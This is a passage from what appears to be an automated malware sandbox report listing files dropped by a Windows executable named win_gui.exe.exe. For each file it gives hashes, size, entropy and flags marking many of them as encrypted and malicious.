                                Encrypted:true
                                SSDEEP:3072:6jYg+qNzMnkwlWmqu1/YAQX5/0l3OIg7qdRzpN:/g+qNzMnkwlWkU1zOd/N
                                MD5:2D5F56DA2A52A98F94FCD3DF5195C5C7
                                SHA1:21EB2E8D805BA1B96086C21E5D9161EBE8E94836
                                SHA-256:7B9B9B15DBFDC71853E8E18D78E749A33E0F9311319F5F1D965171CCA451D996
                                SHA-512:A9D5F926098F5060B8B973FE6463961FE5A2342C66756DC1F9C784DBEEE071A5146516C5CE5D465FDAFDB3E06EAB790414332E2F503D6E6C2D5EEA530967DA49
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):265952
                                Entropy (8bit):7.999292482950315
                                Encrypted:true
                                SSDEEP:6144:kUSxlO77ke1gUcxOH61opWEBnOyvGDwfnIUw6LB:nSLe7kJCaqBnOyvBfPLB
                                MD5:C760023C8A9C190D35CE5E421C7794DA
                                SHA1:8384DBD108C4FBDF9C1355082330D169858B6582
                                SHA-256:9DC06096D11AE9226CC66821ECDAA1A320B4723F8FF2789743DD40F03C41E51C
                                SHA-512:6FCBA8CF26C9C848E50F17F4C261786634878CA4175FE976860354F588066F99005453F05976E6DA8CA801C4C9AA630584456779F2DCF89152BE8FEA13C3D311
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):158432
                                Entropy (8bit):7.998802284391687
                                Encrypted:true
                                SSDEEP:3072:Wu8O7fs3U3OB9jX9fmiYXsHRghDD4UE2ysKbuxcpXcuKmBGF:W9OIUeB9jX9f2XsHorE2QbuxcpMKu
                                MD5:45619959E2E026C06BF53DB08B48E46C
                                SHA1:E94A17C21C9AAB11C8043772688F579D5AFCAAEE
                                SHA-256:EACC041FB222BD19E613388B9B37B5F70B1D05F98E56AFB92EFAE8B09A18B0F0
                                SHA-512:D69A7F225071EF061FF99024AF0D642A67D40F3964143700E9B41D8036D30C90F45B098B2E3977BA2A0D2218626B8D7B7F8DDA279A63E42C07ECFD1AF743DD8B
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):222944
                                Entropy (8bit):7.999122844470482
                                Encrypted:true
                                SSDEEP:6144:V3xaJZo/SAnCedPlX+jfJsnrst0QbcBOX8TOkfIoEpDsn:V3x3/SALdPMfKu5bcBBbBEl+
                                MD5:F6875B13E6C2E4B8C9B997E253732419
                                SHA1:8BA9D4F4625A1C302C1BB74A202554B29078E2AC
                                SHA-256:8BCE89FD3205C0520E47ACBD171E0277D0CE1547CEEF3BD020E3A881039954A1
                                SHA-512:E736CC4AB9F64356C06C6B03BA25279695378E2F3818F438DD280D8FD3419C0A99AAA9E25F69C77B1F227246A8205B40AFFDEDAA8D8445B43B4E18DF0E6FF7F3
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):567520
                                Entropy (8bit):7.227920723668874
                                Encrypted:false
                                SSDEEP:12288:guxkVWawfs0Qp8Juzl6GxZGwviVuedvfEnIjiHGZY4:gWkVuk0QpQuzl6MZIYed8siHGh
                                MD5:B0DC94C4ED5BC78995EECB3E1A78906C
                                SHA1:BBCDCEBA1FBE346672BD129024107E6829EE97B8
                                SHA-256:41AA3325E8332C933BB2941BE7D868BD666C353F846E3F29969344ECAB987C44
                                SHA-512:01BE4D23C976DDA3A18AEF0AC8B6482DE1C57087C1BDA8528D35C2C734FF2E3800729167B45625A7875CE9CEDA504FC51C6B3F0AB90E7511A42C52483A53BD1C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):799456
                                Entropy (8bit):7.340721640492317
                                Encrypted:false
                                SSDEEP:12288:hmPXqcI0g4ZTmIb1W+V+uIGvXXpYUdRhu56+xbj8DjPL+7/rlVInor6e97oOXkGz:qS4oIb4SfHbH0b+ejrlLrFWh2Q4R
                                MD5:E27973C6ED8F58C532486483422363B7
                                SHA1:8F23C8E045D92D9E0C57AB077699EBBDB0C1AD96
                                SHA-256:D4F9AEA50E85204290C6CDD1400C40707781CF491B64EF883CABF0FFC9855DE6
                                SHA-512:FCA98EB50C2CD3FB8815AE5D2A2D26F84AFE24FA9B3D508338A13461D200F497772D55A9D356883D941016D1C134468C37798ADC6A3D30FC45F5B8234729A966
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):140000
                                Entropy (8bit):7.998696269920782
                                Encrypted:true
                                SSDEEP:3072:SoWDDUrfObRUAJvxeCz4Sx9Gpl/5XTaErOSObphuxRo:eDArOVNxe9S4XdmpkxRo
                                MD5:E2837BB33BA9ECB68329218693F681A4
                                SHA1:09BDDD4A37A499911D87CED56796B9BD4CE511E7
                                SHA-256:0E22B639B6FA3436B3BEB12469094C920F7DA3220161FC5825BD7F01C60DBBAC
                                SHA-512:1DBC132BE7EF6DD22E30A5C2758EC1230F585DECAA6008BC699909EB6AAB8C36F5190D0AF2CDE2F74153DE96ECAE4DEAB380F2B8CB6A20147E92A425C676864B
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):176864
                                Entropy (8bit):7.999007606637684
                                Encrypted:true
                                SSDEEP:3072:5F5NcfJ3HMN+07f4iMbFysaWChjYhh2MH+8mEQzNfCddWnPj6zpNs4vs1kWt:MRMQ24iaaZhUhhFe5OinGzXsss1kWt
                                MD5:29C410F21DC6E44873C37C7DFE8F9D87
                                SHA1:716C856419113556136C3786E2BD6F6F2EA01786
                                SHA-256:3C9F0E28E97772A54A7CAED26AD8D45743F4AEA2C87B71E7A59D3C3E4CAB3F7B
                                SHA-512:E6667C704E9166ACABB04963C8E16922515FB6B298D508266FF592E909F9ACAECBFE1C8A6E57D55301F2958E67E1D7226A0CA69784A267C60B62CDEEBAA46D78
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):44768
                                Entropy (8bit):7.995653488210379
                                Encrypted:true
                                SSDEEP:768:ZWSKLK4ZXF1llXqyfhAP4N2PVayHnqCOveCMREZlpeIBD9vewoxYI8PTXnoJjfTL:ZWdLZll6ChE3zCMREZnBxe9x18LodLhB
                                MD5:3E4840663FE8DC449685AD43198DB4D8
                                SHA1:CFEC49F8F56306981B4F48C3F6E133870C21A29A
                                SHA-256:373D4578117EA9C3AC96128CFC4E989447CB0E663125DA35425D9A90C7A4213C
                                SHA-512:85984AEB17D10D3E976C9DA8437FC59623109212C5BC32501B35ECFF8927B0CC87EE1324DD772CAAB2D2F5C8617800B97A96C7B38C867FFDE3434C14B9C1E061
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):23776
                                Entropy (8bit):7.9922148082497255
                                Encrypted:true
                                SSDEEP:384:WlkwQuzC+WkZpvp3RRZGpB8H3jfUOHUmeS0u9gsH7HoiVmcsHfgSursGxhsUr/yw:sewVWkdBO8UBmeA9pDViqsgn/yw
                                MD5:B6D234B2E7339689421F21270EBC54F9
                                SHA1:12C11EAF65A44E36274FE19118B8F3D19C035762
                                SHA-256:6D68E42CB06FEFF125131FB99401E6C1C5B13C04B2B28BD471DA831AFF97D079
                                SHA-512:B052F8F2C0E0CEFA1D0FC0B8719DC84E62FEEB63F49A25298EE87F21ACEBD5EDC4E92A45D099383209149214D60A9AADB50736FDD777DA536A76C5F401DB1085
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):61152
                                Entropy (8bit):7.996887697081187
                                Encrypted:true
                                SSDEEP:1536:p1nfREn1N3KE8qQ1/hi+Vj1qMFhmX1awWkwH2MyjGtLMyf2KVXb22F:XJEn1dK3hiEjcMjwaKpGtZfLVBF
                                MD5:821B20511CFB706F9119A745582B4FBA
                                SHA1:225EFB39427DC70C1659D4057AE02FC749E57240
                                SHA-256:840A7B020C696C2EB272387E05BC7A91F5876D285A07A333C52535E7A8664400
                                SHA-512:608E5459D94883F56FE3D976F5D02A35A9B8B241B07299C7DAC50F6AAAB2386FAD9D8418C64BFE376EE7D63048F413111504B816BFA4B1C3D95FC81E85679113
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):26336
                                Entropy (8bit):7.992462693697551
                                Encrypted:true
                                SSDEEP:384:vzw6j6TQh1+bKqKPD3xZZmNxRGHezZrnE/ggrMVRpgGYJMamMFjA2zBn1eabh+Vm:bZj6kOmb3TEXRG8g/lrMLydFj1dn8OP
                                MD5:61E131A98518C842CF5CCB46F011987D
                                SHA1:17DC307278E4C34D6CE74B8D84144D411F08D2F7
                                SHA-256:FEE27652166F1621BE86E02EEC1EDD178D2878CF7C8080D9001CC4618B68FFB0
                                SHA-512:930421F79370D0F971C31684FA72604F01BFC6A2F15DF5B8A49B875E1235D587206E592FF89AFDD7FADAE9399CC60CC28F2492147F564BF86E8BC40E69420624
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):192736
                                Entropy (8bit):7.9991235609400215
                                Encrypted:true
                                SSDEEP:3072:2+IMWx2NC/0EUUqQpsLC3quUOvMXCXxS5TuItfvyRon07NOr84MO5pSd7pEUHJsw:NqICzUIpscquU6xSFuItbKuMO5gdF5JF
                                MD5:F620692E971418D073313CE39A7C0456
                                SHA1:15AE28BE6E70B25DFC2B206C770A23C463813F21
                                SHA-256:6C024BD7D97651B2BC86F8BF30A3849677F3D1E09B9171E36079C207DBC9B581
                                SHA-512:B1B0D00B9DD40B3FE6EF8FA9A0B5DCD94E5AECC31ABEB5DE2716FE43DC95694FDFFAABDEE6CA2134D66577CE01337C8E9BC7D05C97ABE1539CBD79F0003EED77
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):82144
                                Entropy (8bit):7.997391316758768
                                Encrypted:true
                                SSDEEP:1536:iGS2PoB/QFGULWe54Z5OSK5tHorWKVu0FRyyJOc+3XSQ3Gy/ukT0IT:B5oB4gQX54ZYmWKkSRyuOcuHx
                                MD5:A6FC0E358F2690267B6692FADD330CB5
                                SHA1:88F0D41AF9914F48BD0A3A167CB56819385498B3
                                SHA-256:A398C30B6DE0951ACE6DB525DEA1F7BE70BDC8DB93BC02680D2EA8654ED6F8EF
                                SHA-512:5C19598C0FCDDAE3DC6598A03B262F862AE195AEFBE9A054EB88EF1C75833FAFD73D1C587555A5FE6D06376F91574F1CCBAD57A67069AC7DBEF02C9CD33B12B6
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):757
                                Entropy (8bit):7.679358658025262
                                Encrypted:false
                                SSDEEP:12:AazVw3Li1vQqOLHD5XsYCWw14eNR1PcrSOGJ9fuyAWKj0hOJNuauDZMK5mg/2lWO:A+WuKjj5z/wpDyYPGTNj0hOHAVMJg6WO
                                MD5:CAC5A4971CCE9C105EED85A29EA39C34
                                SHA1:9B06873136DB07A8B926F2665471FA8C4D8CB66C
                                SHA-256:9B171B21D67172A3206BAEBC55AB8740140527A28F27EB4E7BF2CD091DFD3092
                                SHA-512:9F7F080C51E5C69167878E8D99EB0A9E9C7B0740305F94AC9CAF58D0A0A507CA6F58262DAF48AD7FF5E63420BF31977E473C9E819C98A0EC11BECA37C8F13F91
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2090
                                Entropy (8bit):7.908229248728333
                                Encrypted:false
                                SSDEEP:48:5IUXamnvvC4wBGsirnKBpY4UiXjTARxwTwV2Lp8cx/WyYu+MAVMJg6Tz:VpZwgsirKERiXvAROzrxevuAVOz
                                MD5:2DA67F3B772A06B2C0BB4D8929E8B84B
                                SHA1:8EA26C8DFC918E74B0D1B02FF3B407DFEC3C87EC
                                SHA-256:8D7AD3F3D22C3B2A7F924C60492BEEC5CCEFBCC39142FF9099CF2D3D028FA1A6
                                SHA-512:29BBFAD49C22B08176D82E0706F5D6C5E10478B9402996EFD45A3D7FC5654B97C884012D37DBD6F16B7C2C6E440C2AC7497E1B246B2625E537F3F43F1841112C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3040472
                                Entropy (8bit):7.181838696273676
                                Encrypted:false
                                SSDEEP:49152:taAiTtSBz1nEJOOUJbn2RZQVPxS7+EXdnvv8/2fo27:taAiJmzNzt72PQG3n3s2f
                                MD5:EE701AFBF3468FDC335F378E5070D004
                                SHA1:D04600DEC7FAD6636FDF6E5B4DB9E8E40270F227
                                SHA-256:41DDABA0BEC5EFCE33250AD8500C43EECCCF6F747F82DB209C3C2E4B92F39718
                                SHA-512:8657353BE742B3EB2B724FEF3B18E8611367B9615593BE891B84C292D90BE46EDDA3CF7ACF230A35A7D14916626C14D3AE0E9408384ED3A67FE96832A0E9BBD8
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):84963
                                Entropy (8bit):7.997642145601273
                                Encrypted:true
                                SSDEEP:1536:pW3h/t8bGwU7Wu/z70dnDU7l3Yxz8TilOcTAArVKSoyje6YJsK4XFYB:Q3h/t847VLYpU5384aTrrf1VE
                                MD5:FE0AB951DB91111880CEF95179F01CD3
                                SHA1:0C7DFA136D0E935B9148DE7F92B1CDCA76B8472B
                                SHA-256:C7167DFACE786CE2E45F5D667283B977DBF058CBF0437F3A411E80447720E2ED
                                SHA-512:9A36CB05303B2C608C9D0989EE19D72B0A18D3C67A95BA777D5DECBD3AEEF1EA888EB8CD3A2E96E62427968238891B0D94080283CBB9C6C702073FDAD272D704
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6156
                                Entropy (8bit):7.970817282685435
                                Encrypted:false
                                SSDEEP:192:DOrkxXJXnvkM0fKeRZQVe8q2PRGI+xDD2+VOu:qreXJXXyQk8qps+VOu
                                MD5:E72DCB85914526F307FBFF100CC4FEB7
                                SHA1:810AF6545230655479D3038BE5DDF30139C16E6D
                                SHA-256:75B2100934A14590745F386F7602F404737C413D22EE4BA0D4BAC430C4FA4D76
                                SHA-512:43DEEE0DE646DD836DEB63A40B0B66EDD79D3A074ABD8C7896C32CB182E1417120FA69AB6DEA4119A51BFCFFE513FB4450FB1770AA42389B3DDAD7EE68C8770C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4780
                                Entropy (8bit):7.962269785186108
                                Encrypted:false
                                SSDEEP:96:8Vxv+yDdlKd2/iFzN+ZdUYOz7FpAVHUqFQqZJg+X18KrJ6e/y3R7evuAVOO:S+FWmz0Zvo7FyNUqFQq/g018WgeO+VOO
                                MD5:F24F5D1C4A5FA3FF74A530280E5CCB01
                                SHA1:966D74303C8BC8F31FA4F0FF4550D0976331AA8B
                                SHA-256:2C5E9331D4A538FB4B0B406690DEB227513555C69BF505B543CC2F0F55B47DE7
                                SHA-512:012D4B09CB716425DAFDD932D0D6AA28772F5E70C3736D100F1E90B0A7CF1BAA0768DD5F59650C322CB41194905BF429C60E93EC821102279C399016176AAA91
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5057623
                                Entropy (8bit):7.176136538023316
                                Encrypted:false
                                SSDEEP:49152:qSY8nhXihl3RJESJ+vH8wi7pmm6q6dlnwT6HYHNY8AFEr7eDCJtL6n:nY8ntifHd+xlnFC+DCen
                                MD5:0F54581D2339F6B7D6D6264127DAAD45
                                SHA1:97ABDAF7730DF2A4B96E29123F905E4FF8644CDB
                                SHA-256:FC07F3A6DB2391E8C6CFF1B08CC154D0A5A573D02A3B93356F473379E4B03E84
                                SHA-512:A8E8FA7025186BF58676CEB7B3F5962F0F132C3932D45207229455B154849B5039416A68245D672DFCE573073D225BACD192C5824C3D86F0E7672DCF43A7A31A
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4536
                                Entropy (8bit):7.951694197960495
                                Encrypted:false
                                SSDEEP:96:Cp7/wwxmJVKSsCYJOb7PdEU6TDXzZocRogIYGkUPq2hZcevuAVOm:Cp7/wwcVKSUJYDsTD9ocjIYnkq2hC+V7
                                MD5:4AC267C53D52802C4B8F4AA92B0C9036
                                SHA1:D13458492CE1184E28E42E5D844550329FD382D0
                                SHA-256:3FE33D986B7C83DAF393A8005EDA5F5BC7B962B27881046773170BEAA073F2D0
                                SHA-512:34AFA55606A5BD2A705284CC8C6A4F802819AA4C92DB3745061803F141DD06BE66FFF726409FDE7D60EAF223CAD8F2882599E4E44EA07390996F291F4C5D9370
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):4386
                                Entropy (8bit):7.961941819748066
                                Encrypted:false
                                SSDEEP:96:PD+6mF0K0/f2knAu6BUaZVTuqghLrzarb7KcZevuAVOn:C62gl6BBZVTuqSDaH7KcZ+VOn
                                MD5:1DBB665A8B7B813F0B5F6A949DFB97E8
                                SHA1:A245F659D33137B1FE5A482DA350B8E380DE81A8
                                SHA-256:8014AC41F95D80CFCE8814FF993701D38EBCE939B1D55EFD516C48A6034B00BA
                                SHA-512:8ED3FD57159ED1D00BDF5F79B911613A84A68F362A81787CA6C055CDF2727B3A423B049289B3919188E7FFCE44537A13D7212E8E05CE3E677C907C326BD4B4B5
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11186
                                Entropy (8bit):7.982934220941608
                                Encrypted:false
                                SSDEEP:192:+NI702cN8CCWePl8Xm3KM+QDrH4V7l+OpOMZuGA3rk5jK9WK4QfUkHkhUfjpt37j:eMAePM0KNQDTO7AQO+3+8K9WKbRkSrzf
                                MD5:4FF2BDEA1A10678223B0B26106D9CF24
                                SHA1:BA9CC7C4D5EF74F984408398C061E95E3203CCF2
                                SHA-256:DA2373436906972D17404D0BDFD75E47D4839ABB954D59E30658FD891D25E44D
                                SHA-512:9CD4F026A923D1536DEE8EEEAAFFBFB1D45930D763E13128D79EFD5F796D293912666D1A2B8808FA1B9B246EC00008F59BF058003A00B8B1A57DC606F60BEA34
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14570
                                Entropy (8bit):7.987220077995155
                                Encrypted:false
                                SSDEEP:384:jiDQE9lvFW0QEDo6mP7s9UqPddlCxX63yWaJzMw+VOA:ODQElB07smwHfydp8
                                MD5:488612BC3597392B442D858A2571A396
                                SHA1:A9A63A4FFA4451D4C54152C6819D0F67E79E469F
                                SHA-256:92802D6A2D1DA0FAD81C4F7BD39CCB1CA8DA289C2A570F6ABC5D902ECFA86A31
                                SHA-512:AEE297B3526134CCAD0E8A416619011EBF2F6C0DE2E5C4A4F4AB072591F6F8949EDB00179D455B7DD5C1423FAEF56FEBF060F598B1999E483E585A314B142408
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):664
                                Entropy (8bit):7.631467939639301
                                Encrypted:false
                                SSDEEP:12:xuVbsYCWw14eNR1PcrSOGJ9fuyAWKj0hOJNuauDZMK5mg/2lWOZOs9NXzku:xqbz/wpDyYPGTNj0hOHAVMJg6WXs9R
                                MD5:AFB7F2A0A80F3EDC66547A5A75404FE2
                                SHA1:05C80EA77275446A9AD195F676F6196C88ECDE15
                                SHA-256:D71451C54269270450E50049FBF4EF612A3386721AC98FE9FC5BAC975FC8EF1B
                                SHA-512:63676FC458BEFC7B79871777DA3C676E78DA1CBA9B3C0A9DBD9FD9F25E3B0480F32CB93FA8A0903FCFE854E4BD4828C5D15B92A55721C0A0AD80FFD277ABFC88
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):957531
                                Entropy (8bit):6.9462170581160505
                                Encrypted:false
                                SSDEEP:12288:OCdYnv+0yKb9a2LtVoiYEN5eNS3rjZpNlBsZACAaiYtJ+KQ:OCdYnvnhtVojENUNYJRqKNVYjQ
                                MD5:7FBB29A6FD4C0C2B315095ED890BF113
                                SHA1:9EF79E9A8E5AD34FFF724326A398D8A987F29832
                                SHA-256:B2C3A2E0B94F6245FBA061156377D2D182A52644C783F97275354F4AA8794097
                                SHA-512:90E23588E84647CFEFE8A137F1B15E8C83F471B53A3C487A1E3B60C590FB1DF6931DCAA653A86113006CF4040008B3956CF1FEE1DAEB4C5B3E0082637DB56C7A
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):123332
                                Entropy (8bit):7.998743784494614
                                Encrypted:true
                                SSDEEP:3072:Rh30YPzWp+n0xUC6H2rxRZEBE/yykOze1b7D5bI4YB6:fkYbWplUVWrxR4ckOzIU6
                                MD5:36973C84B92D480218179D65882EB4E7
                                SHA1:FC1EC1CCE74F225C2BAB4222DB67807E17396E47
                                SHA-256:4B4AD29B53A483D89F8DED8FAC2A3D9074C73AE005C634D601175729007E9958
                                SHA-512:041908DE1C2139F3DBA33BB77E52494AA778B6C1C6F02A2871E5C58B98DEC429FCA76D9616D2370E4A9320A89633CB13A9FB83B0654C5EF935939E2852CC979E
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):574879
                                Entropy (8bit):7.4128984671385965
                                Encrypted:false
                                SSDEEP:12288:cYPid0Ya9+zrfx5l+qU67FYWg+YWgYWeoXqgYSqYQh2f/m5NwaHkSIJHvWQ6Q7o9:cYqdza9Krfx5l+qU67FYWg+YWgYWeoXw
                                MD5:59B870ABDE86B6D7561CFE135185A400
                                SHA1:22694627B5F29A75F5A54684EF11833CF7AC9479
                                SHA-256:E69A23BB3F50355B5446E6DA0E2CC272D24D91CEC1384C8265C2DBACB6FD0867
                                SHA-512:A286BB19A7B69EE2A98B1415079E11275FFC3E710DCA9F9561156CA40BF73B1C4366F306CE32535D3005214943A0BFF9870F272648F53B04AB253CD82B0F18A2
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34526
                                Entropy (8bit):7.9945329385042125
                                Encrypted:true
                                SSDEEP:768:RBTqjwOEDasOaNYmm1MWjlzBIHFKdexPAmpqpC51Hv:R2qGHcYeWjZ3gxkYP
                                MD5:EFAD53837D78671D0F5A0172242812BF
                                SHA1:2A9EE651E913F77FB167C58394050F38DF228AEB
                                SHA-256:E38331B04D6D9B26C54145507AB3D71815FD4D8A244BB7F2FD2F622328F8AB3D
                                SHA-512:D6409AD7E4F461652177CE5D5C2BA6EC43E7EC0AB8731B5A5FF20F3760649467B6E455ADDC085A43CD10C9F9CBC03C4593495081B03536135076310DD48704DA
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1790929
                                Entropy (8bit):6.8459507684295735
                                Encrypted:false
                                SSDEEP:12288:KVy4Mo70l8djm0Ru1G7Yc/oUu4BrOp66Xe2bmfi4yRPwkC3Dc0nNXHA5LyIhIhJ:KVy7o7/tR4G77u49OpTnbUeJCAsCy2I3
                                MD5:07299C9F08C41BC09DAE4C8D6D5B544E
                                SHA1:869501374AEC16076FEF5E4D0B711A69E8EEA973
                                SHA-256:41CA171AFEB6FDFCFDBD4667753A34C96C52DAE0AF0E0E6C62A3E8EF5ED2BFB1
                                SHA-512:8BFA66C84A2C1F35106540EABD9436997ECCB1F21018ED2E858C5DEF6BA4646A0A29097C9405AA97A44A2AC27ECD19744AFE8B34AA24F3F81F0C45BA1E72F944
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4834
                                Entropy (8bit):7.954143588502139
                                Encrypted:false
                                SSDEEP:96:nz8F43Czajp58FwL9tooXgGW+GvNbkY5NMMeKGzCdGevuAVOvA:nwF4ZTSw4OgGYFjN7eFGw+VOvA
                                MD5:6F5C8EE85BA36B2FA04276EE73F8239D
                                SHA1:049D10085A86597C309F2FE4C762227D750DB5B3
                                SHA-256:B11DF0A06FD492A2ADA95902952351A71802522932BE736920BAF3D709D81768
                                SHA-512:3612CCF0F1923C24F907156577A7108D83CC27DD3DFC10CDCD2E17F0BD52D94CEDD4829C1E79B94009D02E3D563270E481AF43F02118D0BD227CE49ABCA4E797
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3063
                                Entropy (8bit):7.944445303369046
                                Encrypted:false
                                SSDEEP:48:etR9+jiI7We7rL7Q69t176qYd0jcYOb64Q51mbsSpdlK2+kv4/IhNqjAQHBlp/W4:q22IWoQ69tLwWcYOb6312sS/skvJ7qA0
                                MD5:90E7CC6A7F06415748913FCD34C3ACC7
                                SHA1:AC51565ED6160248DB34E443B7069EDAAFC15DA4
                                SHA-256:ED060DA27071FC964440C16A4B67489E496ACE3DED6E3B97D9FA4A27DCCB1681
                                SHA-512:7862524A77345891739F7D59969D3BFE5316FD6EEAF5F8600323B0F02CDF05CEC6CD089B5DA09712ADB6B492C008F8992E43D0222203A64411CB987E9193B33F
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):990
                                Entropy (8bit):7.77280451964711
                                Encrypted:false
                                SSDEEP:24:1RqPIWc6DN/mHhgmz/wpDyYPGTNj0hOHAVMJg6WXs9foQ:OPIWREhgG/WyYu+MAVMJg6TR
                                MD5:C0331714E410237DAE63A4FF1B436053
                                SHA1:6DD35CFB2045FDEC94E07F56A99FC4E06A16AB3A
                                SHA-256:1FDD59359821EA5F1C6C367A4FF0F2C484B7681F5CC80080502EB4FFEBC93FFC
                                SHA-512:87E426CC50EB685E0CC2F74D484B52B69D3E0BBBDCC78344F89E8314FB692D1E2929A01597C99424BB11A35AC2732B3E00AA8E0594BAF7705CF218409487B8AC
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2734
                                Entropy (8bit):7.932272661252192
                                Encrypted:false
                                SSDEEP:48:QVxFqR9/a57HYPkSYN4tvfwg838HBoSaBqdevsaueEJvv70fMcYJ+t6y/WyYu+Mr:XR9C5rMjwehixEav4vv7OYJ+tdevuAVo
                                MD5:81005A9D5586940456AE2B8EB56D0B6E
                                SHA1:C58744D86B3A4146DB245A232606083C511DD5FC
                                SHA-256:7E9F1C1B1269961C95D72F46938BD0A25F8A633C01C42596335089BB6CA125B4
                                SHA-512:C8D179C366F2CF5FACE3847B8787763280786CE624EF6DEF4E884A89138FD8A1AEBEE68081C113D06F5D2D06233572725C4DE1C99D064774DD59763E8261F1D3
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5960
                                Entropy (8bit):7.964383265374068
                                Encrypted:false
                                SSDEEP:96:1Kyk9J0+L8NMiAjT2YzSR7tLwtqL935FpLsyi6CvLiGpZH5eWeV5I9evuAVOl:1TklLYMtjTZzS/LwtW93Ty/67mZeo+VQ
                                MD5:8B427CE184C8DDB058E23A5549F26A7F
                                SHA1:2E668B1B446C6E4D8A6CDF7E53D158D0AD02679A
                                SHA-256:A44630A34767E7D704DCB654042B53D34E1A0B2CEAC9389E823D79B7158D9376
                                SHA-512:71D05D4DF2FBD3ABC5F073FAC378952E903405A4F84632A5DBE335A03A3E64A5AAB1C13FAA52BD32577ED1670FEA9E34FF1229432C826E9ED01B4C06C5CA0C0E
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1925397
                                Entropy (8bit):6.886058879417841
                                Encrypted:false
                                SSDEEP:12288:6yKVNV4ajgNA8T33jVQSWUNZU4sVa7pm8gP+/G5jyvspP8+swnaCG:VKVP4GgNZP5PZQGm8lG5lSQaf
                                MD5:5FDE12316964103B34259CBAC940CE88
                                SHA1:535DED448C7759FDA1BAE748C16D8C6661B839BF
                                SHA-256:31A8A50E7E9A203ED3DB70E94E3BC1F3D07CCB42D0A86BBF292251D6137ADE5E
                                SHA-512:BE8284A1D98D41CB5243CC32A5BD112258FE61EBD183253E4BF648976EEFB342A7639A8F2D71CE53070133DC3BE1936A0FF9AD159814695857FF9E88F7FD2664
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3404
                                Entropy (8bit):7.9385087438793
                                Encrypted:false
                                SSDEEP:96:CxK4e0jT+EoTP1z9IqjPpbeNExpRRjd5Mic1mevuAVOb:qK4eCT+3TP1ZhpbeN4pPjwzm+VOb
                                MD5:4B7E66843B2838CAF18D58025363EE38
                                SHA1:5494F0DCDB3A54801CD18963CBCFFBDEA46F4EA4
                                SHA-256:6879F99E7CFB772D914C55BE74358E5F4E5BD2B26D5779DCD6BBFB28523AF679
